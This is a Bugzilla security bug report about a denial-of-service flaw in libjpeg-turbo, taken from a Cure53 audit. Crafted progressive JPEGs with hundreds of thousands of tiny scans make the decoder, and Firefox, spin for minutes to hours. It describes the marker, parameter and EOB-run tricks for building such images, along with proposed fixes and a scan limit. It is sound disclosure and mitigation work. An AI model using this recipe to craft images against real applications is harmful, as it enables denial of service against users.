Open Bug 1252196 Opened 9 years ago Updated 2 years ago

libjpeg-turbo: DoS via progressive image decoding

Categories

(Core :: Graphics: ImageLib, defect, P3)

defect

Tracking

()

People

(Reporter: jaas, Unassigned)

References

Details

(Keywords: csectype-dos, sec-low, Whiteboard: [gfx-noted])

Attachments

(2 files)

When the decoder code hits a marker while an arithmetically-encoded scan is decoded, all following requests for more input data by the arithmetic decoder are fulfilled using zero-bytes until the scan is complete. This can be used by an attacker to cause relatively big processing times with the use of small inputs. More specifically, supplying only SOI, DQT, SOF and SOS markers3 without any image data, the attacker can cause libjpeg- turbo to decode a whole scan with attacker-chosen dimensions (possibly limited by the application). This behavior in itself is not very interesting, however, because the CPU usage is bounded by the dimensions of the frame. Conversely, a progressive, arithmetically-encoded frame can contain multiple scan segments, with each of them being only 10 bytes long as long as they consist exclusively of the SOS marker. Because libjpeg-turbo permits images to envelop an arbitrary number of frames, this can be used to increase the processing time per image linearly in the file size. For high CPU usage, it is necessary that decode_mcu_DC_refine() is used as decode_mcu handler. Otherwise, the other handlers have fastpath handlers for the case that the input is stuffed with zero-bytes. Therefore, Ah needs to be non-zero and Ss needs to be zero. The following code constructs a JPG file with 8192x8192 dimensions and 8MB in size. This way, it is being saved to the disk and attempts to load via libjpeg- turbo: [DRC to supply link to relevant source] This case is detected and reported with the use of a JWRN_BOGUS_PROGRESSION warning. Evidently, the library does not treat it as an error by default and fully decodes every scan, causing tjDecompress2() to run for 6 hours (tested on an Intel i7 processor). It is recommended to either abort bogus progression or, if error tolerance is desired here, skip the decoding of bogus scans that do not supply additional information.
NOTE: The bug description above is largely cribbed from a recent security audit report by Cure53. I asked Josh to post it as a Mozilla bug in order to get input from other developers, since I don't quite know how to solve it upstream without breaking backward compatibility with the libjpeg API. The bug affects Firefox (see below.) LJT-01-003: Pathological JPEG causes the decoder to spin for hours (affects libjpeg and all derivatives thereof) The report from Cure53 identified this as a bug in the TurboJPEG API when decoding arithmetic-codec JPEG images. Mozilla uses neither of those features. However, Cure53's description of the issue in the report was of insufficient scope. When I researched the issue further, I discovered that it is also easily reproducible in the underlying libjpeg API and with progressive Huffman-coded images. Using the attached program (test003.c) with "#define ARI" commented out, you can make decode_mcu_AC_refine() in jdphuff.c spin for hours. Commenting/uncommenting different values for sos[] will similarly make decode_mcu_AC_first(), decode_mcu_DC_refine(), or decode_mcu_DC_first() spin for hours. It is easy enough to change the behavior of the libjpeg API so that it treats warnings as fatal, but changing that behavior would basically introduce a backward incompatibility, so it isn't a very palatable solution. The Cure53 report recommended introducing a "fast path" into the handler functions, which would handle the case of input stuffed with a lot of zeroes. However, given that I have very little understanding of the progressive Huffman codec in general, I'm not quite sure how such a "fast path" could be crafted.
Summary: libjpeg-turbo: DoS via progressive, arithmetic image decoding → libjpeg-turbo: DoS via progressive image decoding
To elaborate on why making warnings fatal by default isn't a very palatable solution: libjpeg has traditionally (and by "traditionally", I mean since the early 90's) handled warnings by calling emit_message() in the error handler but continuing to process the image. Lots of programs (particularly image viewers and such) rely on this behavior, because it allows them to decode as much of a corrupt image as possible. However, as pointed out by the Cure53 report, it also opens a couple of exploits (this one and https://bugzilla.mozilla.org/show_bug.cgi?id=1252200). Changing the default behavior would effectively change the behavior of the libjpeg API, because it would cause that API to call back the error_exit() function in the error handler when a warning is encountered, instead of the emit_message() function. Any program is already free to make warnings fatal, simply by implementing its own error handler and causing any call to emit_message() to trigger the same application behavior as error_exit(). However, most programs don't do that. Most programs either use the "stock" error handler (jpeg_std_error()) or write their own that doesn't treat warnings as fatal, so most programs will be affected by this issue. Thus, it would be very desirable to craft a fix that works around the issue in such a way that (a) The default behavior of the libjpeg API is unchanged (thus, applications won't suddenly discover that error_exit() is being called when it previously wasn't.) (b) All applications receive the fix, regardless of whether they are using a custom error handler or the default one.
Group: core-security → gfx-core-security
Whiteboard: [gfx-noted]
NOTE: The symptoms of this issue manifest in Firefox as follows: Take the image generated by test003.c with "#define ARI" commented out and attempt to open it in Firefox using the appropriate file:/// URL. On my Mac, running Firefox 44.0.2, Firefox starts eating up 2 core's worth of CPU time. Closing the tab in which the JPEG is decoding doesn't cause the high CPU usage to go away. I have to force quit the application in order to get it to stop eating up the CPU.
(however, while it's eating up the CPU, I can still use Firefox to open other tabs, etc.)
Cribbing this comment from the other bug report, since it's really more applicable to this bug: (In reply to Josh Aas) > It seems to me that if we want to fix the insecure behavior for as many > folks as possible we'd need libjpeg-turbo to break backwards compat and > treat warnings as errors. If we end up feeling that breaking backwards > compat is necessary then calling error_exit() in the default handler > obviously won't fix things for people with custom handlers, but I'm not sure > how we could fix things for them without essentially ignoring the handlers > (I just don't know enough about the handler impl, maybe DRC knows a way). I'm hoping that maybe there's a way to fix this algorithmically so that the codec detects this specific situation and trips an error, but I may be dreaming. I don't know whether there may be some specified limit to the number of scans in a progressive Huffman or arithmetic file, but the file generated by test003.c has about 800,000 scans. That definitely seems excessive. :) Also, the last sentence in the Cure53 description says: "if error tolerance is desired here, skip the decoding of bogus scans that do not supply additional information." That seems like a winning idea, but I'm not sure how to do it. > Is there a way to limit the breakage by only doing error_exit() for certain > more dangerous types of errors? These are the warnings that are generated (many many times) with this particular bug: If using progressive Huffman: jdhuff.c:380 -- Corrupt JPEG data: premature end of data segment (JWRN_HIT_MARKER) (appears always) jdphuff.c:143 -- Inconsistent progression sequence for component 0 coefficient 0 (JWRN_BOGUS_PROGRESSION) (appears only if using either the first or second sos[] value in test003.c) jdphuff.c:147 -- Inconsistent progression sequence for component 0 coefficient 1 (JWRN_BOGUS_PROGRESSION) (appears only if using either the first or third sos[] value in test003.c) If using arithmetic: jdarith.c:663 -- Inconsistent progression sequence for component 0 coefficient 0 (JWRN_BOGUS_PROGRESSION) (appears if using the first or second sos[] value in test003.c) jdarith.c:667 -- Inconsistent progression sequence for component 0 coefficient 1 (JWRN_BOGUS_PROGRESSION) (appears if using the first or third sos[] value in test003.c) Note that if using the fourth value of sos[], along with arithmetic coding, *no* warning appears (ugh.) That may not matter for Mozilla, since you guys aren't using arithmetic decoding, but from the point of view of fixing this in libjpeg-turbo, it seems that we can't always rely on warnings to tell us that this bug is occurring. Yet another reason why an algorithmic solution is desirable. Also, treating the JWRN_HIT_MARKER warning at 380:jdhuff.c as an error would really defeat the purpose of fault tolerance-- that is, it's probably going to be that warning that is encountered most often when an image viewer tries to decode a corrupt JPEG, and it wants to display as much of the image as possible. > The only other alternative I can think of is to use the API extension > mechanism to introduce a flag toggling behavior for the default handler. You > could do it either way - break backwards compat and let people restore it > easily with the flag, or leave backwards compat and let people get the > secure behavior by setting the flag. We might have to resort to that. If we did, then it would mean that applications wouldn't automatically inherit the fix, but maybe that's OK, because it seems like this is mainly going to be a concern for browsers and such. Standalone image viewers/editors/converters will probably want to keep the existing behavior, so they can decode as much of the corrupt JPEG as possible, and if someone tries to run this pathological 800,000-scan JPEG through ImageMagick, they'll wait 30 seconds and CTRL-C it, so no harm done. If we modified the behavior of the default emit_message() function, that should catch *most* applications. Even if an application uses its own error manager, it's very rare for it to override emit_message(), and if it does, then it will be its responsibility to decide whether to treat warnings as errors or not. For this specific bug, it would even be possible to set a warning limit-- even something as high as 100-- after which warnings would be treated with errors. However, that wouldn't fix the other bug (https://bugzilla.mozilla.org/show_bug.cgi?id=1252200 AKA LJT-01-004), because that other bug only causes one warning to be triggered (JWRN_HIT_MARKER at 380:jdhuff.c.)
Further research has led to the discovery that this issue can be triggered by a completely valid progressive Huffman-encoded JPEG image that causes no warnings whatsoever to be issued by libjpeg. The attached program (test003c.c) generates such an image by taking advantage of the "EOB run" feature in progressive JPEGs, which allows a couple of bytes of Huffman-encoded input to represent up to 32767 MCU blocks worth of zeroes. Thus, each 8192x8192-coefficient scan in the image can be represented using only 90 bytes. The image begins with a single DC scan, in order to avoid the JWRN_BOGUS_PROGRESSION warnings. DC scans cannot use the EOB run feature, so that scan occupies 8192 * 8192 / 64 / 4 = 262,144 bytes, but that still leaves room for nearly 80,000 AC scans of about 100 bytes each. This is an order of magnitude fewer scans than in the original test image, but it's still enough to make libjpeg spin for nearly 10 minutes while decoding the image. And, of course, this will scale almost linearly with the size of the input image-- 16 MB would make the decoder spin for 20 minutes, 32 MB would make it spin for 40 minutes, etc. It has already been demonstrated that it's very easy to trigger this issue in the arithmetic decoder without triggering any warnings. These new findings show that it is more difficult, but still possible, to trigger the issue in the progressive Huffman decoder without triggering any warnings. Whereas the severity of the issue is greatly reduced by using a valid JPEG image, it's still the case that 100 bytes of input cause the decoder to generate a 64-megapixel output scan (in the invalid JPEG image, this was accomplished using 10 bytes.) I don't think that there is any way around that, since the decoder is required to fill the output scan with zeroes in order to comply with the JPEG specification. Whereas the original test images were producing computation on the order of 10 minutes per megabyte of input data, the new image produces computation on the order of 1 minute per megabyte of input data, but that's still ridiculous. I now believe that there is no legitimate way to work around this without placing some sane limit on the number of scans in a progressive image, and what that limit should be is probably best decided by individual applications. It should be straightforward to extend the API to accommodate this new "max scans" parameter.

Note that this issue is - AFAICT - unaddressed in the standard (or libjpegturbo, based on the lack of consensus about how to proceed.) https://libjpeg-turbo.org/pmwiki/uploads/About/TwoIssueswiththeJPEGStandard.pdf was authored to draw attention to this issue.

Group: gfx-core-security
Keywords: csectype-dos
QA Whiteboard: qa-not-actionable

In the process of migrating remaining bugs to the new severity system, the severity for this bug cannot be automatically determined. Please retriage this bug using the new severity system.

Severity: major → --

This isn't really a bug per se. What's happening is that a compression feature of the progressive JPEG format-- the ability to represent large runs of zeroes using a very small amount of data-- is being exploited to generate a relatively small JPEG file that contains an unreasonable number of scans (tens or hundreds of thousands), so the amount of time the file takes to decompress is unreasonable relative to its size. djpeg in libjpeg-turbo 2.1.x has a -maxscans argument that demonstrates how to limit the number of progressive scans to a reasonable number, thus working around this issue. Per my comments above, I believe that that is the most appropriate way for browsers to work around it. (You should also consider making libjpeg API warnings fatal, because that decreases the attack surface for this and other issues. djpeg in libjpeg-turbo 2.1.x demonstrates how to do that as well.) Per above, it is possible to create a perfectly valid progressive JPEG image that exhibits this issue, due to the fact that the JPEG format places no limit on the number of scans. Thus, it is incumbent upon applications to work around it by refusing to decompress images beyond a certain reasonable number of scans. Even a limit of 1000 scans effectively works around the issue, and I dare you to find a legitimate JPEG image with that many scans. (Note that the TJFLAG_LIMITSCANS flag in the TurboJPEG API, which is used by libjpeg-turbo's OSS_Fuzz targets, implements a scan limit of 500.)

Severity: -- → S3
See Also: → 1823614

Filed bug 1823614 to give us a finite limit on the number of scans. Not sure if there are more/separate problems here from that.

You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: